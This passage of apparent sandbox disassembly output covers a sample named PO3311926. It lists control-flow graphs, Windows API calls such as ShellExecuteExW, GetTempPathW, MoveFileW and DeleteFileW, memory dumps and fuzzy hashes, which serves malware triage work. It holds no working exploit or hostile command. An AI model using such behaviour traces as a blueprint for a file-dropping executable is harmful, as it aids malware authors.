725->726 727 bbd974 725->727 726->727 727->712
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00BBD7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00BBD8DE
                                                                                              • IsWindowVisible.USER32(?), ref: 00BBD911
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00BBD91D
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00BBD92E
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00BBD959
                                                                                              • CloseHandle.KERNEL32(?), ref: 00BBD97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00BBD9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                              • String ID: .exe$.inf
                                                                                              • API String ID: 3646668279-3750412487
                                                                                              • Opcode ID: 481705dd2077e720c36f9313d187f985141078144c13963687c7ba32c8d82197
                                                                                              • Instruction ID: 5791313defbd4fec13adbf8f52286c8693c32d31d0ce55d59303bac0a7249ccc
                                                                                              • Opcode Fuzzy Hash: 481705dd2077e720c36f9313d187f985141078144c13963687c7ba32c8d82197
                                                                                              • Instruction Fuzzy Hash: EB51B1705083809BDB319B249854BFBBBE4EF46744F04089EF5C5972A1FBF98985C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 753 bca95b-bca974 754 bca98a-bca98f 753->754 755 bca976-bca986 call bcef4c 753->755 757 bca99c-bca9c0 MultiByteToWideChar 754->757 758 bca991-bca999 754->758 755->754 762 bca988 755->762 760 bca9c6-bca9d2 757->760 761 bcab53-bcab66 call bbfbbc 757->761 758->757 763 bca9d4-bca9e5 760->763 764 bcaa26 760->764 762->754 767 bcaa04-bcaa15 call bc8e06 763->767 768 bca9e7-bca9f6 call bd2010 763->768 766 bcaa28-bcaa2a 764->766 771 bcab48 766->771 772 bcaa30-bcaa43 MultiByteToWideChar 766->772 767->771 779 bcaa1b 767->779 768->771 778 bca9fc-bcaa02 768->778 776 bcab4a-bcab51 call bcabc3 771->776 772->771 775 bcaa49-bcaa5b call bcaf6c 772->775 783 bcaa60-bcaa64 775->783 776->761 782 bcaa21-bcaa24 778->782 779->782 782->766 783->771 785 bcaa6a-bcaa71 783->785 786 bcaaab-bcaab7 785->786 787 bcaa73-bcaa78 785->787 788 bcaab9-bcaaca 786->788 789 bcab03 786->789 787->776 790 bcaa7e-bcaa80 787->790 791 bcaacc-bcaadb call bd2010 788->791 792 bcaae5-bcaaf6 call bc8e06 788->792 793 bcab05-bcab07 789->793 790->771 794 bcaa86-bcaaa0 call bcaf6c 790->794 796 bcab41-bcab47 call bcabc3 791->796 808 bcaadd-bcaae3 791->808 792->796 809 bcaaf8 792->809 795 bcab09-bcab22 call bcaf6c 793->795 793->796 794->776 806 bcaaa6 794->806 795->796 810 bcab24-bcab2b 795->810 796->771 806->771 811 bcaafe-bcab01 808->811 809->811 812 bcab2d-bcab2e 810->812 813 bcab67-bcab6d 810->813 811->793 814 bcab2f-bcab3f WideCharToMultiByte 812->814 813->814 814->796 815 bcab6f-bcab76 call bcabc3 814->815 815->776
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC57FB,00BC57FB,?,?,?,00BCABAC,00000001,00000001,2DE85006), ref: 00BCA9B5
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BCAA3B
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BCAB35
                                                                                              • __freea.LIBCMT ref: 00BCAB42
                                                                                                • Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38
                                                                                              • __freea.LIBCMT ref: 00BCAB4B
                                                                                              • __freea.LIBCMT ref: 00BCAB70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1414292761-0
                                                                                              • Opcode ID: 399e81aac893b4ed6c16457f5b09ef14f1a2eeb1eda8dc1bdc52cb15cf5bcbe9
                                                                                              • Instruction ID: 9e54c302502c7e158c4eaf42c090d3036c5d0bb78346728b9450ccffd71aa629
                                                                                              • Opcode Fuzzy Hash: 399e81aac893b4ed6c16457f5b09ef14f1a2eeb1eda8dc1bdc52cb15cf5bcbe9
                                                                                              • Instruction Fuzzy Hash: 9951C17261021AABDB258F64CC85FBBB7EAEB44758F1546ADFC04E6140EB34DC40D6A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 818 bbce87-bbce8a 819 bbd009-bbd00c 818->819 820 bbce90-bbceb5 GetTempPathW call bab690 818->820 822 bbd3d9-bbd404 call bbb314 819->822 823 bbd012-bbd018 819->823 829 bbceb9-bbcee5 call ba4092 call baa231 820->829 830 bbd40a-bbd418 822->830 831 bbc793-bbc7a1 822->831 826 bbd01a 823->826 827 bbd024-bbd02b 823->827 826->827 827->822 840 bbceb7-bbceb8 829->840 841 bbcee7-bbcefe SetDlgItemTextW 829->841 835 bbc7a2-bbc7b7 call bbaf98 831->835 842 bbc7b9 835->842 840->829 841->822 843 bbcf04-bbcf0a 841->843 844 bbc7bb-bbc7d0 call bb1fbb 842->844 843->822 845 bbcf10-bbcf2b call bc22c6 843->845 849 bbc7dd-bbc7e0 844->849 850 bbc7d2-bbc7d6 844->850 854 bbcf7b-bbcf82 845->854 855 bbcf2d-bbcf39 845->855 849->822 853 bbc7e6 849->853 850->844 852 bbc7d8 850->852 852->822 858 bbca5f-bbca61 853->858 859 bbc9be-bbc9c0 853->859 860 bbc7ed-bbc7f0 853->860 861 bbca7c-bbca7e 853->861 856 bbcfb4-bbcfe4 call bbadd2 call bba7e4 854->856 857 bbcf84-bbcfaf call bb0602 * 2 854->857 855->854 862 bbcf3b 855->862 856->822 896 bbcfea-bbd004 EndDialog 856->896 857->856 858->822 863 bbca67-bbca77 SetWindowTextW 858->863 859->822 866 bbc9c6-bbc9d2 859->866 860->822 868 bbc7f6-bbc850 call bba64d call babdf3 call baa544 call baa67e call ba6edb 860->868 861->822 865 bbca84-bbca8b 861->865 869 bbcf3e-bbcf42 862->869 863->822 865->822 871 bbca91-bbcaaa 865->871 872 bbc9e6-bbc9eb 866->872 873 bbc9d4-bbc9e5 call bc7686 866->873 933 bbc98f-bbc9a4 call baa5d1 868->933 876 bbcf56-bbcf73 call bb0602 869->876 877 bbcf44-bbcf52 869->877 879 bbcaac 871->879 880 bbcab2-bbcac0 call bc3e13 871->880 884 bbc9ed-bbc9f3 872->884 885 bbc9f5-bbca00 call bbb48e 872->885 873->872 876->854 877->869 886 bbcf54 877->886 879->880 880->822 902 bbcac6-bbcacf 880->902 892 bbca05-bbca07 884->892 885->892 886->854 899 bbca09-bbca10 call bc3e13 892->899 900 bbca12-bbca32 call bc3e13 call bc3e3e 892->900 896->822 899->900 921 bbca4b-bbca4d 900->921 922 bbca34-bbca3b 900->922 907 bbcaf8-bbcafb 902->907 908 bbcad1-bbcad5 902->908 911 bbcb01-bbcb04 907->911 914 bbcbe0-bbcbee call bb0602 907->914 908->911 912 bbcad7-bbcadf 908->912 915 bbcb11-bbcb2c 911->915 916 bbcb06-bbcb0b 911->916 912->822 919 bbcae5-bbcaf3 call bb0602 912->919 931 bbcbf0-bbcc04 call bc279b 914->931 934 bbcb2e-bbcb68 915->934 935 bbcb76-bbcb7d 915->935 916->914 916->915 919->931 921->822 930 bbca53-bbca5a call bc3e2e 921->930 928 bbca3d-bbca3f 922->928 929 bbca42-bbca4a call bc7686 922->929 928->929 929->921 930->822 949 bbcc11-bbcc6b call bb0602 call bbb1be GetDlgItem SetWindowTextW SendMessageW call bc3e49 931->949 950 bbcc06-bbcc0a 931->950 951 bbc9aa-bbc9b9 call baa55a 933->951 952 bbc855-bbc869 SetFileAttributesW 933->952 970 bbcb6a 934->970 971 bbcb6c-bbcb6e 934->971 940 bbcbab-bbcbce call bc3e13 * 2 935->940 941 bbcb7f-bbcb97 call bc3e13 935->941 940->931 975 bbcbd0-bbcbde call bb05da 940->975 941->940 963 bbcb99-bbcba6 call bb05da 941->963 949->822 985 bbcc71-bbcc85 SendMessageW 949->985 950->949 953 bbcc0c-bbcc0e 950->953 951->822 958 bbc90f-bbc91f GetFileAttributesW 952->958 959 bbc86f-bbc8a2 call bab991 call bab690 call bc3e13 952->959 953->949 958->933 968 bbc921-bbc930 DeleteFileW 958->968 990 bbc8b5-bbc8c3 call babdb4 959->990 991 bbc8a4-bbc8b3 call bc3e13 959->991 963->940 968->933 974 bbc932-bbc935 968->974 970->971 971->935 978 bbc939-bbc965 call ba4092 GetFileAttributesW 974->978 975->931 988 bbc937-bbc938 978->988 989 bbc967-bbc97d MoveFileW 978->989 985->822 988->978 989->933 992 bbc97f-bbc989 MoveFileExW 989->992 990->951 997 bbc8c9-bbc909 call bc3e13 call bbfff0 SHFileOperationW 990->997 991->990 991->997 992->933 997->958
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00BBCE9D
                                                                                                • Part of subcall function 00BAB690: _wcslen.LIBCMT ref: 00BAB696
                                                                                              • _swprintf.LIBCMT ref: 00BBCED1
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00BE946A), ref: 00BBCEF1
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBCFFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 3d85f6e73e462e1779611ecd15c0ffcc1926362846dae8b0c89dc624da171b3a
                                                                                              • Instruction ID: 38275589f743c46b60188ac80ae440e2e6a0fe2264bcd0cc99c298d2d91da5d0
                                                                                              • Opcode Fuzzy Hash: 3d85f6e73e462e1779611ecd15c0ffcc1926362846dae8b0c89dc624da171b3a
                                                                                              • Instruction Fuzzy Hash: 0C414DB1900259AADF21DB908C95EFE77FCEB05340F4080E6B909E7192EEB49A448F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1002 bc3b72-bc3b7c 1003 bc3bee-bc3bf1 1002->1003 1004 bc3b7e-bc3b8c 1003->1004 1005 bc3bf3 1003->1005 1006 bc3b8e-bc3b91 1004->1006 1007 bc3b95-bc3bb1 LoadLibraryExW 1004->1007 1008 bc3bf5-bc3bf9 1005->1008 1009 bc3c09-bc3c0b 1006->1009 1010 bc3b93 1006->1010 1011 bc3bfa-bc3c00 1007->1011 1012 bc3bb3-bc3bbc GetLastError 1007->1012 1009->1008 1013 bc3beb 1010->1013 1011->1009 1016 bc3c02-bc3c03 FreeLibrary 1011->1016 1014 bc3bbe-bc3bd3 call bc6088 1012->1014 1015 bc3be6-bc3be9 1012->1015 1013->1003 1014->1015 1019 bc3bd5-bc3be4 LoadLibraryExW 1014->1019 1015->1013 1016->1009 1019->1011 1019->1015
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00BC3C35,00000000,00000FA0,00C02088,00000000,?,00BC3D60,00000004,InitializeCriticalSectionEx,00BD6394,InitializeCriticalSectionEx,00000000), ref: 00BC3C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: d15fac7298134452a0764b95372047c8bb66721fbda3dffb485729e9488701a5
                                                                                              • Instruction ID: 66b4d55ee89d14ea0587687c66650416f5e6cc3a95b89ddebc575124c63f3849
                                                                                              • Opcode Fuzzy Hash: d15fac7298134452a0764b95372047c8bb66721fbda3dffb485729e9488701a5
                                                                                              • Instruction Fuzzy Hash: CE11C135A05221ABCB228B689C81F5E77E4DB05F70F6141A9E811EB290E761EE008AD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1020 bbabab-bbabca GetClassNameW 1021 bbabcc-bbabe1 call bb1fbb 1020->1021 1022 bbabf2-bbabf4 1020->1022 1027 bbabe3-bbabef FindWindowExW 1021->1027 1028 bbabf1 1021->1028 1024 bbabff-bbac01 1022->1024 1025 bbabf6-bbabf8 1022->1025 1025->1024 1027->1028 1028->1022
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00BBABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00BBABF9
                                                                                                • Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BBABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: @UJu$EDIT
                                                                                              • API String ID: 4243998846-1013725496
                                                                                              • Opcode ID: 5d9f8e12119e2e9faee8b8b239d5278813b8f4aaf46d0ff9ff9f645de601c120
                                                                                              • Instruction ID: a41caceb73b90ac65ab598d23995044068421b4812e483b0edf3c91f823f87ae
                                                                                              • Opcode Fuzzy Hash: 5d9f8e12119e2e9faee8b8b239d5278813b8f4aaf46d0ff9ff9f645de601c120
                                                                                              • Instruction Fuzzy Hash: 74F08232A0122977DB3056249C09FEF76AC9B46B40F494092BA05A21C0D7A1DE45C5B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1029 ba98e0-ba9901 call bbec50 1032 ba990c 1029->1032 1033 ba9903-ba9906 1029->1033 1034 ba990e-ba991f 1032->1034 1033->1032 1035 ba9908-ba990a 1033->1035 1036 ba9921 1034->1036 1037 ba9927-ba9931 1034->1037 1035->1034 1036->1037 1038 ba9933 1037->1038 1039 ba9936-ba9943 call ba6edb 1037->1039 1038->1039 1042 ba994b-ba996a CreateFileW 1039->1042 1043 ba9945 1039->1043 1044 ba99bb-ba99bf 1042->1044 1045 ba996c-ba998e GetLastError call babb03 1042->1045 1043->1042 1047 ba99c3-ba99c6 1044->1047 1048 ba99c8-ba99cd 1045->1048 1054 ba9990-ba99b3 CreateFileW GetLastError 1045->1054 1047->1048 1049 ba99d9-ba99de 1047->1049 1048->1049 1051 ba99cf 1048->1051 1052 ba99ff-ba9a10 1049->1052 1053 ba99e0-ba99e3 1049->1053 1051->1049 1056 ba9a2e-ba9a39 1052->1056 1057 ba9a12-ba9a2a call bb0602 1052->1057 1053->1052 1055 ba99e5-ba99f9 SetFileTime 1053->1055 1054->1047 1058 ba99b5-ba99b9 1054->1058 1055->1052 1057->1056 1058->1047
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BA7760,?,00000005,?,00000011), ref: 00BA995F
                                                                                              • GetLastError.KERNEL32(?,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA996C
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BA7760,?,00000005,?), ref: 00BA99A2
                                                                                              • GetLastError.KERNEL32(?,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA99AA
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA99F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 65b452aaf520a359954d775686fc56365facebc0d2be5956e8b070c91f275fa6
                                                                                              • Instruction ID: 06e9a4076ceaf195382dd5a6b269f74e34d865a5d9764e3d02602c70196ef2e9
                                                                                              • Opcode Fuzzy Hash: 65b452aaf520a359954d775686fc56365facebc0d2be5956e8b070c91f275fa6
                                                                                              • Instruction Fuzzy Hash: 3431F330548745BFE7209B24CC86BEBBBD8FB46320F100B59F9A1961D1E7A4A944DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1088 bbb568-bbb581 PeekMessageW 1089 bbb5bc-bbb5be 1088->1089 1090 bbb583-bbb597 GetMessageW 1088->1090 1091 bbb599-bbb5a6 IsDialogMessageW 1090->1091 1092 bbb5a8-bbb5b6 TranslateMessage DispatchMessageW 1090->1092 1091->1089 1091->1092 1092->1089
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
                                                                                              • IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
                                                                                              • TranslateMessage.USER32(?), ref: 00BBB5AC
                                                                                              • DispatchMessageW.USER32(?), ref: 00BBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: d3c6cf24265bd95f8ff01cf1f0448896370a8a4904b7136806261275c4ec88e8
                                                                                              • Instruction ID: 29e68c6cfa7ce0440197ff1e6aea22ea8faed780693820445f3a84ec6b1b8940
                                                                                              • Opcode Fuzzy Hash: d3c6cf24265bd95f8ff01cf1f0448896370a8a4904b7136806261275c4ec88e8
                                                                                              • Instruction Fuzzy Hash: 1AF0BD71A0215AABCF209BE6AC4CFEF7FBCEE052957014415B509D2050EBB4D605CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1093 bcba27-bcba51 call bc97e5 call bcbb4e call bcb7bb 1100 bcba57-bcba6c call bc8e06 1093->1100 1101 bcba53-bcba55 1093->1101 1105 bcba9c 1100->1105 1106 bcba6e-bcba84 call bcbbf0 1100->1106 1102 bcbaaa-bcbaad 1101->1102 1107 bcba9e-bcbaa9 call bc8dcc 1105->1107 1110 bcba89-bcba8f 1106->1110 1107->1102 1111 bcbaae-bcbab2 1110->1111 1112 bcba91-bcba96 call bc91a8 1110->1112 1115 bcbab9-bcbac4 1111->1115 1116 bcbab4 call bc8b6f 1111->1116 1112->1105 1119 bcbadb-bcbaf5 1115->1119 1120 bcbac6-bcbad0 1115->1120 1116->1115 1119->1107 1121 bcbaf7-bcbafe 1119->1121 1120->1119 1122 bcbad2-bcbada call bc8dcc 1120->1122 1121->1107 1123 bcbb00-bcbb17 call bcb691 1121->1123 1122->1119 1123->1107 1128 bcbb19-bcbb23 1123->1128 1128->1107
                                                                                              APIs
                                                                                                • Part of subcall function 00BC97E5: GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
                                                                                                • Part of subcall function 00BC97E5: _free.LIBCMT ref: 00BC981C
                                                                                                • Part of subcall function 00BC97E5: SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
                                                                                                • Part of subcall function 00BC97E5: _abort.LIBCMT ref: 00BC9863
                                                                                                • Part of subcall function 00BCBB4E: _abort.LIBCMT ref: 00BCBB80
                                                                                                • Part of subcall function 00BCBB4E: _free.LIBCMT ref: 00BCBBB4
                                                                                                • Part of subcall function 00BCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BCBA44,?), ref: 00BCB7E6
                                                                                              • _free.LIBCMT ref: 00BCBA9F
                                                                                              • _free.LIBCMT ref: 00BCBAD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID: 0"V$0"V
                                                                                              • API String ID: 2991157371-3870919522
                                                                                              • Opcode ID: e26bafbe53645001891805208a726d3e3e5268a44d6a35b6cc22612f972b35ba
                                                                                              • Instruction ID: a3643c14737fdcb41a4435f8b65cc4f73f4fcb46bbc13730bdc8fbe7fe5e260c
                                                                                              • Opcode Fuzzy Hash: e26bafbe53645001891805208a726d3e3e5268a44d6a35b6cc22612f972b35ba
                                                                                              • Instruction Fuzzy Hash: 50316D31904209AFDB14EBA8D846FADB7E5EF40320F2540DEF9549B2A2EF729D41DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
                                                                                                • Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858
                                                                                              • OleInitialize.OLE32(00000000), ref: 00BBAC2F
